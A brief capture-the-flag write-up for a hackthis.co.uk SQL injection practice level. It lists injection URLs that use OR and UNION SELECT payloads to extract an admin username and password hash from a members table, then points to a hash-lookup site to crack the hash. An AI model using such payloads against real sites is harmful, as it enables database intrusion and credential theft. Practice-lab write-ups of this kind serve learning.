hackthis.co.uk sqli level 2 write up

hackthis.co.uk sqli level 2 write up

Visit this site to get administrator's username.

https://www.hackthis.co.uk/levels/sqli/2?browse&q=b%27%20or%20admin=1---

Easy to get it.

admin username is 'bellamond'.

https://www.hackthis.co.uk/levels/sqli/2?browse&q=b%27+union+select+admin,username+from+members+where+username=%27bellamond%27---

typing this, you can get admin value of bellamond.

https://www.hackthis.co.uk/levels/sqli/2?browse&q=b%27+union+select+password,username+from+members+where+username=%27bellamond%27---

And you got the hashed password of bellamond.

Get real password.

http://md5decrypt.net/en/Sha1/

Wow~! 9reat!